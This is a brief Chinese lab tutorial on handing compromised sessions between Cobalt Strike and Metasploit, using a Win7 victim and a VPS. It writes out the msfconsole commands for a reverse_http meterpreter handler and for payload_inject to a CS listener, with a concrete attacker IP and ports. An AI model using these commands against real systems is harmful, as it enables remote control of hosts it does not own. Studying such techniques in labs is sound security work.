MSF与CS之间会话传递

环境：一台win7，一台有CS的主机，一台有MSF的主机。

我这里用的是一台win7，一台vps（CS和MSF都在同一台vps上）。

CS会话转移到MSF

1.CS配置监听器这里大家应该都会就不写了。

2.CS生成后门文件。

3.运行后门文件，实现CS上线。

4.CS配置监听器。

5.MSF开启监听模式。

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http #注意要和生成的监听器一致

msf6 exploit(multi/handler) > set lhost 120.48.71.109 或 msf6 exploit(multi/handler) > set lhost 0.0.0.0

msf6 exploit(multi/handler) > set lport 8888

msf6 exploit(multi/handler) > run

6.CS添加会话，选择增加会话spawn，然后选择我们添加的会话。

MSF收到会话

MSF会话转移到CS

1.MSF将会话放于后台

meterpreter > background

2.选择模块

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

msf6 exploit(windows/local/payload_inject) > set session 1

msf6 exploit(windows/local/payload_inject) > set lport 80 #CS监听端口

msf6 exploit(windows/local/payload_inject) > set lhost 120.48.71.109 #CS地址

msf6 exploit(windows/local/payload_inject) > run